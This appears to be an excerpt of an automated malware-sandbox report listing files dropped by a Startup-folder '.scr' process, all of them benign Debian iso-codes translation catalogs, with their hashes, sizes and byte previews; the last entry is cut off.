                                                                                                    Preview:................L.......|.......H.......I.......N.......X......._.......i.......r.......{...............................................................................................................................................................".......*.......3.......9.......@.......E.......K.......T.......^.......g.......k.......s.......z...............................................................................................................................................................................%.......,.......8.......@.......E.......K.......R.......[......._.......d.......l.......t...............................................................................................................................................................$.......+.......1.......:.......B.......I.......P.......W.......a.......h.......x.......................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 13 messages, Project-Id-Version: iso_639-5 'Afroasiatiske spr\303\245k'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1237
                                                                                                    Entropy (8bit):5.201281432371167
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:VgwZuQySHf68648wqJXTt0UziFrww/RXmGIHX4PBsoustxsj7KXNa:awu1CUCrww0VHXyBsoustxsHKXNa
                                                                                                    MD5:D5DA3F4153AE2BF8FB67F33A2DA907B6
                                                                                                    SHA1:E150CE64A278DFCC2F70146987FFEE9D496C686A
                                                                                                    SHA-256:6E2756CDA141B11A0EBF639687FA656E1673D343265191EE06C19F7995350535
                                                                                                    SHA-512:98E060E0DD5E3A8FBBF3B16C080C210E002CFA1E4291E1901B1455AB01122F17E06D224EB11998CD8A3CB42FB7CE1DDA18EF3A299BC306E14D976F2E00C4334D
                                                                                                    Malicious:false
                                                                                                    Preview:................................0.......1.......H.......].......r...........................................!...........................-...............#.......6.......B.......Y.......i.......u................................................................................................................Afro-Asiatic languages.Algonquian languages.Athapascan languages.Austro-Asiatic languages.Baltic languages.Bantu languages.Berber languages.Bihari languages.Caucasian languages.Central American Indian languages.Chibchan languages.Uto-Aztecan languages.Project-Id-Version: iso_639-5.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2019-05-17 01:48+0000.Last-Translator: Allan Nordh.y <epost@anotheragency.no>.Language-Team: Norwegian Bokm.l <https://hosted.weblate.org/projects/iso-codes/iso-639-5/nb_NO/>.Language: nb_NO.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 400 messages, Project-Id-Version: ne_merge '\340\244\205\340\244\253\340\244\227\340\244\276\340\244\250\340\244\277\340\244\270\340\245\215\340\244\244\340\244\276\340\244\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32389
                                                                                                    Entropy (8bit):4.997293147170928
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:1kZU7qMKB+x8wtj18jq5wsOP4XJOAjgiZj2PCY7L7pB0xesq3pRm8d9Ze:1CgPta+msOP4XJOAjkCy0IsqfmYe
                                                                                                    MD5:FE5465BA01A5BBD5C6F6397729EFB21D
                                                                                                    SHA1:7A618DA867429B40CC509D516E9103096802619A
                                                                                                    SHA-256:2AA61E21EF7DCB7130F401ECF11BE96007649A0C44B30B6E51A92746D7034ADE
                                                                                                    SHA-512:545CAE858E58A72F49FCC724B58624F8ECAD71DB2D7B1EAD8E76638475E7ECA1B32350F628ECA7B02879DDBCDFAF1FCFA5DDFEF4432CCDDE08F5A9E08FE86B76
                                                                                                    Malicious:false
                                                                                                    Preview:.................................!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......'"....../"......5"......?"......G"......R"......Z"......b"......m"......v"......~".......".......".......".......".. ....".......".......".. ....".......#......##......,#......:#......A#......`#......w#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$......"$......+$......D$..,...`$.......$.......$..%....$.......$.......$.......$.......$.......$.......$.......$.......%..%....%..,...:%.."...g%..*....%.......%.......%.......%.......%.......%.......%.......&.......&.......&......*&......2&......:&......C&......_&..'...m&..$....&.......&.......&.......&.......'....../'......4'......<'......C'......Q'......b'......r'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(.......(.......(......#(......*(......8(......?(......E(..!...a(.......(.......(......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: ne_merge '\340\244\254\340\245\215\340\244\260\340\244\277\340\244\237\340\244\277\340\244\266 \340\244\206\340\244\250\340\245\215\340\244\237\340\244\276\340\244\260\340\244\237\340\244\277\340\244\225 \340\244\225\340\245\215\340\244\267\340\245\207\340\244\244\340\245\215\340\244\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3799
                                                                                                    Entropy (8bit):5.195253311731869
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qDmYwhQyB0F9i+Cf0GkgcRgTwqMuPhb0Bfbhwkcc+qc:qDmYw2jCsVmz
                                                                                                    MD5:C482B547ECD92E4033724504500CFE3C
                                                                                                    SHA1:6C9956A409FCBC27E698AEB670339C8B9649ED90
                                                                                                    SHA-256:AD18C43CD9EEDD8F96FD5A0BCE629CEF60A7A8B872C454315AD6CF26E32BBE85
                                                                                                    SHA-512:3099CDFC30FC04E3B3D146A51D0B70421CC84697A239B8CB8808667C72F33BEFBFDEDC90AE22EEF1F8D45F8E5CF2619CF296B892CF4CDF14E810C8160CAA4C9F
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................G...Q...>.......x.......Q...Q...............4...2...G..."...z...;.......6.......g.......Q...x...?...............(...*...7...S...%.......+.......+.......2.......8...<.......u...1.......F.......n.......B...s...Z...................#..."............................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10224
                                                                                                    Entropy (8bit):5.05098865103854
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dk2oSFKyDiwy+AMltU4WjV9qWxa5hW8/IVjPm2i4OcgPIyWPgD:NvFTNg4WjVDxa5hW8/ItWrcM2PgD
                                                                                                    MD5:1CE08FCA7AEAC545F44813A3082A4859
                                                                                                    SHA1:C8E5AD5DAE3AF73852EACE64516568714AAEBF08
                                                                                                    SHA-256:6BDEFDF5C0E9E364B8431B53F287E192F6115C587D927E6D503F4FFB60F97CAC
                                                                                                    SHA-512:C57A4A1B97A2E413DCDB8D1A0280AA9C7D5577AB6C9BA1A5E565E84930593463EF0DFD5534864DE21FD4993F08443258E08F0EEBA28120B2580231236D7DAE18
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23512
                                                                                                    Entropy (8bit):5.018399017928312
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSos4tTRe4txP0A+qUB46nbjz5wsWP48WAINiZGy9fGlZoAZp8:0o9TRe4txzjm48fmsWP48WAI8O6AZy
                                                                                                    MD5:1ACE1A26FDB4FA88F6966082E3B37FA8
                                                                                                    SHA1:504FFBCC401239A01DDD7A1BE5696206F2FEB3C3
                                                                                                    SHA-256:B0F5DF85AA5DE79CD87B9EDB4DB887B8861D894934C4722FB46F28410A2D4A59
                                                                                                    SHA-512:0C24E583AE4E9F22D2BC9E8A4AEE157AE7FA707648EA56DBBB4AC2DD98291B56B7E3323C50EE1DC13C905EF62212322842872535CA632A57E059B392BAA5B397
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 4893 messages, Project-Id-Version: iso_3166-2 ''As\304\253r'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):215191
                                                                                                    Entropy (8bit):5.341154793825851
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:X/yvM+H4NFvtHluTODkvvojbEo/Ay5hKNur1N9QH6d/C9KrVFjY8w1UKGbn8QygK:X/0YNXQZvojLYOLVC96VOQnBub
                                                                                                    MD5:C3ED67D0AF4CCCC3A6FBA2B93991F924
                                                                                                    SHA1:4E9FC335886D3DE67720B97961019B84BBAE6CD5
                                                                                                    SHA-256:467ABCB4C1DBF08B0851CC6B2BE9DA1FD8C8CAE45B2855389264263963B21ED1
                                                                                                    SHA-512:D3612A6A466636E45D42B8D273C5B0B8889AF3310987200262904EF092E96222C8A747B67A84E29532B1BD91585F1C93D289364999C38BD355A09CB8246A6C3B
                                                                                                    Malicious:false
                                                                                                    Preview:.........................1....................................................".......*.......1.......E.......S.......a.......f.......n.......s.......|.........................................................................................................................."...............8.......A.......G.......[.......e.......r.......w....................................................................................................................".......(.......5.......;.......D.......H.......O.......U...+...[............................................................................................................%......./.......9.......F.......S.......b.......m............................................................................................................-.......B.......V.......b.......o.......y....................................................................................................$...............;.......E.......T.......a.......o.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Brits Antarctisch Territorium'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2959
                                                                                                    Entropy (8bit):5.1779730317097705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3b+L5llOZ+vGqIfdvqN5CoUlJmkICjqSpFSD6oETDiAkTMz:rLvUOZ+yaComJmk5OAEaA4
                                                                                                    MD5:A57E2FD83C614F5A7F6C0A15A162754D
                                                                                                    SHA1:8B949C26AEA660C3FDE02C8B4BB2B3D9E21510A5
                                                                                                    SHA-256:4332CF61F6E3F24A3A2D02D03E1D107DD931E3144DD51C4E2D1E03A1551F89A6
                                                                                                    SHA-512:1157638956006169EC08D6E7C0F9352E98EDDA9CCC26E45DF061E9F7A3A8EBA6892D5874A80093C4146BC0A7638A1C3EFCC044C354722B37FC5AD1A80181747E
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.............................../...)...Z...Y...........=...........................*.......5.......O...*...d...........................................................&...........D.......U.......k.......r...,......./............... ...................:...1...K.......}........... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'ADB Eenheid van een rekening'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10365
                                                                                                    Entropy (8bit):4.943921130831523
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFmZVhbww6VRyK0G/2LCntxHIf9wnpLsSNsSWUgdrHTKgdAgISd7Z:SYftww6TL0G/Uo/HIVwnpLsSNsSCd5Ek
                                                                                                    MD5:9911C82D658E1ADD85FAD8AAD713B8E9
                                                                                                    SHA1:6F00CD7D2E633A04D50D19AC9335E760DD770138
                                                                                                    SHA-256:6D125E6FBAE644588C3E6E82AC9E9F63ABD2B2613CBFD3981A9E676D38D4A7D8
                                                                                                    SHA-512:8EB8644FD0CF1F4E6AAED0DF4B11FAEE047F1304E816580DBA04388C648C8D9545DF8CC7FA9E4938CDC76FB94F5FAAA1EED71DD62BC860DC0B305287564CB854
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1915 messages, Project-Id-Version: iso_639-3 'Aari'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):86365
                                                                                                    Entropy (8bit):5.09944606086632
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:Mr4ZbiONmLUHLySyBm+Rb2CSHDvTdn75vnShADemfvteEAr:q4lIUHLT0m+nU7dnAme8FeEc
                                                                                                    MD5:A17FD3194E18F8E8175C0D9A9DB7762B
                                                                                                    SHA1:FF5E54E089A77ED1A6271F127648C11D5B22E5FF
                                                                                                    SHA-256:E02EC0161044C37CDDF05618BF7FD76DCFC572CAD4BE863E775ACF8EA15DC733
                                                                                                    SHA-512:48D5BC781F1D5E75B1D7541CB08B527C09EEF7040CDFD92A4AB3D826C06FFC04920DF52CC3A08A30CF753620058534E3831CCF86E1F9C519D90B22F12274DAF0
                                                                                                    Malicious:false
                                                                                                    Preview:........{........;.......w.......................................................................................................(.......8.......=.......C.......G.......T.......Y.......^.......d.......i.......q.......x........................................................................................................................................................".......)...............2.......8.......=.......R.......Y.......b.......l.......t.......|........................................................................................................................................................................$.......*.......-.......5.......<.......E.......N.......S.......].......e.......i.......n.......s.......|.........................................................................................................................................4.......I.......X.......g.......m.......}..........................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'Afro-Aziatische talen'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7532
                                                                                                    Entropy (8bit):4.809861187663467
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:XohhvFk/Dxi2cBOLPsqsRSlSE0BfCuXr5VcJHVCQW8tGzwgSeZaIjGGJY6VexP5:4SDxnPFSE0BfNcaCSW
                                                                                                    MD5:006553457A1C6BDA37FFEFFA9FC2818A
                                                                                                    SHA1:C3CB789CE55AC2BFD34907F6EB530A4B7DFA16DF
                                                                                                    SHA-256:7AA8417C9B30F3D62CF9AE0A6A79778385F45166E484A93D496833089EB60BCE
                                                                                                    SHA-512:6693075CFA8698371CD89BD9B7D564C760FE8AA1E9EE9533669F77377B2BA67F1E212AFF2D203A817AA2F338F58954D9E724F4E6B2A745D38384E0A28D014B14
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...........................................".......8.......I.......X.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 77 messages, Project-Id-Version: iso_15924 'arabisk'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3464
                                                                                                    Entropy (8bit):4.63798702217428
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:CoJTL+p16ljqv2oqfHo/VTMIiiWJdONgX3JlUzC8Xz/lAynqQaQWKR0ctFj:1pKf6levug/V4Ip23JlZDyn7aDpmFj
                                                                                                    MD5:1EC26858FD5BAE0C2DB3239E17FBCF93
                                                                                                    SHA1:90E040C5C611A9D0FB1D9CEE245E643775C98221
                                                                                                    SHA-256:0AA6D4576DCC3B1CE6CEE66007C5AD2CC6C107BBB0B8F33D248F7C4655E3AD72
                                                                                                    SHA-512:91310761CBD17CA07E084CF1B7FA109A2F9B25DC49B5C343A89B7E76E852EBFA6BD984DE88E5557CE1367E1FD638AFD3BAF44B2B3CAF487B7CF1D662340E88CE
                                                                                                    Malicious:false
                                                                                                    Preview:........M...........g...........................................................................................................................................................................'.......9.......N.......Y.......`.......f.......o.......x...............................................................................................................................................................%.......+.......6.......B.......H.......P.......].......f.......q.......|...................................................................................................................................%...................2.......A...k...D.......................................................................................................................".......(.......0.......;.......E.......W.......j...............................................................................................................................................................%.......,.......6.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 402 messages, Project-Id-Version: nn 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21966
                                                                                                    Entropy (8bit):4.997191938254033
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:PoR6zELK4PoqmBKibZfVjj5wsOP4XOAEOurmNwo1T4+kybAdTqtE:gRfNoqGZ9XmsOP4XOAEjELkybANqi
                                                                                                    MD5:746E49DAEC4B7AA35E6C337A7E8A248C
                                                                                                    SHA1:B7CBBC27626059EE32F93A94C39FC9C5A05A07F5
                                                                                                    SHA-256:1A93677E4885C029C289A4F7BA35B1DC0AD94929BBF03B959EF124A2C2B9F164
                                                                                                    SHA-512:68D9F030B14DED76E281119AA6501C9D9901E5D501E5C70C2B4C532EF6136401DED5C99D5210737EF59505F536586F14824A513BAA011F9ACBC801AC9D5C34FD
                                                                                                    Malicious:false
                                                                                                    Preview:........................<........!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......*"......4"......G"......O"......U"......_"......g"......r"......z".......".......".......".......".......".......".......".......".. ....".......".......".......#......"#......+#......9#......@#......_#......v#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$......!$......*$......C$..,..._$.......$.......$..%....$.......$.......$.......$.......$.......$.......$.......$..%....%..,...0%.."...]%..*....%.......%.......%.......%.......%.......%.......%.......%.......&.......&...... &......(&......0&......9&......U&..'...c&..$....&.......&.......&.......&.......'......%'......*'......2'......9'......G'......X'......h'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(.......(.......(...... (.......(......5(......;(..!...W(......y(.......(.......(.......(..0...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: nn 'Britisk antarktis'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2601
                                                                                                    Entropy (8bit):5.153896878521266
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADzza4NMvGqIfdvqNuuUoSOlWXykSTNOJ9UzE:qDn4yBudSrQOqE
                                                                                                    MD5:4A06BE3FF3D61377FFA38AC7866F5378
                                                                                                    SHA1:D0BFAA1AE7925970F3733EF392DC3935CA894D8C
                                                                                                    SHA-256:D0C8209FB7D8AF7ED945BD8EA1CECCA07A9C84F6DFF3F0E90D54A9FA518F6A93
                                                                                                    SHA-512:D83A35B6073D7994543E33A2AA9C49594B9C605FBFD824973828990C68F9D30E4C9D8E9098E26703C3B7C87345574BAC4DBCDE0DBE8135E2F562CCBF7BD7E964
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c.......................D.......V...4...f...........8...........................................+...+...A..."...m..................................................."...................0.......E.......L.......Z...3...r...........$...............'....................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 140 messages, Project-Id-Version: iso_4217 'Afghanske afghani'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7566
                                                                                                    Entropy (8bit):4.816400916957066
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:QuMFkS2j72xzSg7pFxpzbUxIv8ldS3kxKm9qAJYk3IcJgLaCv9L8nYZ:j72TwGEOkJz6k3IcEhd8nYZ
                                                                                                    MD5:C9EF8E08B47F4907AF7C8CCB2DB8807B
                                                                                                    SHA1:36F61CB80963D015F910F3FEAE6103EB5438297F
                                                                                                    SHA-256:DF66A790666A38BBD1B061A448798AF02698D4C8AE690793BB9DA4AFE1E3EC4F
                                                                                                    SHA-512:A4859A5222C061A1A947784CC5977EE11B56985B810E01FD21A6C85941E0A5738CFB48F38D25A8BA7BFFCE36F972D4628327FBAF4E4303D62E46F995BEA85CD5
                                                                                                    Malicious:false
                                                                                                    Preview:................|......................................................................./.......>.......C.......J.......Z.......h.......y...............................................................................................'.......3.......E.......P.......].......d.......q.......w....................................................................................................... .......0.......5.......<.......D.......R.......c.......k.......y...............................................................................................................................$.......1.......;.......@.......P.......b.......r.......................................................................................................(.......0.......?.......I.......P.......^.......n.......w...............................................................................................................................#.......4.......K.......O......._.......f.......v...............................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 176 messages, Project-Id-Version: iso_639-3 'Abkhasisk'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7462
                                                                                                    Entropy (8bit):4.715757676485261
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:uTxfdrBMfAm1sYO8y5aTM0mLjPNr2IpD1+x7WNqyQppk4:uTXryfL+YOlkTMjjlBQDe4
                                                                                                    MD5:AEC6C80DC6FD9B21AE25CD216343AA6E
                                                                                                    SHA1:E49E241BCD7BE5CC50C01CD02936261997074E21
                                                                                                    SHA-256:7FF38D7224C4A6C12A72F25CE86718525A0038D36FF52818C128F2E9EE1F4164
                                                                                                    SHA-512:8C2661504B8DDBBC10B29EE485338D90CC494A9479DDD22F171091F22D03670E1DB879C938F4D171F0E6DF35F3440711AB2AE4534AB30E45586E0CC22C54C2BE
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................................................................(......./.......8.......A.......H.......P.......W.......c.......l.......t.......|.......................................................................................................................................................................0.......8.......T.......^.......g.......k.......q.......y.......................................................................................................................................................".......,.......6.......:.......?...:...J.......................................................................................................................................#.......+......./.......5.......=.......H.......R.......k.......v...............................................................................................................................................................'...............9.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 184 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7830
                                                                                                    Entropy (8bit):4.643398675865676
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:els7HuYrCJFNhOstTHFUTaf0sKopWTjFUUaf082hh:mbLrsYzFUWf9KokfFUjfh2hh
                                                                                                    MD5:E9B8820AC6F329CF0EF556923D912DF2
                                                                                                    SHA1:3FA5C946B7AA64B79AC3D80C194A279536183806
                                                                                                    SHA-256:442744890C2B5166DD776592AE75E65A49E3CF4CC04567694F6C3D9E73A16E59
                                                                                                    SHA-512:8CD8E4715F39D37E4E005587354C21383E4FD1605AF57373D9878150F3D9F1525ACA9C837C80F2EB9A9134475FD273561C6E07AAAB13223ADE313417A6E74170
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................................................................................................................ .......(.......0.......;.......D.......L.......T.......[.......a.......i.......p.......x............................................................................................................................... .......&.......1.......9.......>.......E.......T.......\.......e.......n.......................................................................................................................................................#.......-.......5.......:.......D.......K.......Y.......`.......f.......o.......y.......................................................................................................................................................................!.......+.......6.......A.......H.......Q.......Z......._.......e.......v...............................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 13 messages, Project-Id-Version: iso_3166-2 'American Samoa'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):932
                                                                                                    Entropy (8bit):4.986349047903934
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:sq9OgZ+dS98nhNkyzYSt0UREvLIXmFhNkybEYnF3:s/dS9ehNpU/UmvLpFhNpwYnF3
                                                                                                    MD5:4429E10B36E525334AB91D21C8DD32DE
                                                                                                    SHA1:4860DA228118231B5FE0173A680731B75B1D6330
                                                                                                    SHA-256:6219C3381FAFE237CC4784C68EFFFD70032A7F0FAA0462FD463E33491AF6F0D1
                                                                                                    SHA-512:41F737B3312EFD9FFDFCA2CE334DDD01ECE171E50183140E3D40B2B0589ABAC2D2B10B8F49A2147709691CD426EB60D9DAF1DB0862665A22C37EFB48A4D8175F
                                                                                                    Malicious:false
                                                                                                    Preview:................................0.......1.......@.......F.......M.......V.......^.......c.......m.......r.......x...............................1.......@.......F.......M.......V.......^.......c.......m.......r.......x........................................................................................American Samoa.Aruba.Belize.Djibouti.Georgia.Guam.Guatemala.Mali.Niger.Northern Mariana Islands.Puerto Rico.Zaire.Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2002-11-13 15:30+0200.Last-Translator: Jerry Thobejane <jerry@translate.org.za>.Language-Team: Northern Sotho <sepedi@translate.org.za>.Language: nso.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.X-Generator: KBabel 1.0beta2..American Samoa.Aruba.Belize.Djibouti.Georgia.Guam.Gautemala.Mali.Niger.Lebowa la Mariana Islands.Puerto Rico.Zaire.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 'Netherlands Antilles'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):521
                                                                                                    Entropy (8bit):5.187497277945643
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:icK1xjt02Ukh/E8T0xtexAvgXmBQWiR8ZAp:fW5t0UREvLIXmg
                                                                                                    MD5:C9D99CD6E434B809B107CF4B369DB177
                                                                                                    SHA1:A6F1C5CF6B53562FAFC63CC59FC6D654AA45B06C
                                                                                                    SHA-256:39F6B738FD8F54985675430978380C9B6D3C1D3418AEAB0BBB4A222BE32EEDAE
                                                                                                    SHA-512:11B09101FBEC762ED38A55FE71E82FE7FBABBF7B613B0FB4A5A4B18AF3D9FB5D50EC0E44C9A8CF5B8F4849A778E0203AAB2438E4F2B31377E62184A5257FFED4
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q.......f................................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2002-11-13 15:30+0200.Last-Translator: Jerry Thobejane <jerry@translate.org.za>.Language-Team: Northern Sotho <sepedi@translate.org.za>.Language: nso.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.X-Generator: KBabel 1.0beta2..Netherlands Antilles.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 60 messages, Project-Id-Version: iso_639-3 'Seburu'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2872
                                                                                                    Entropy (8bit):4.646649791428897
                                                                                                    Encrypted:false
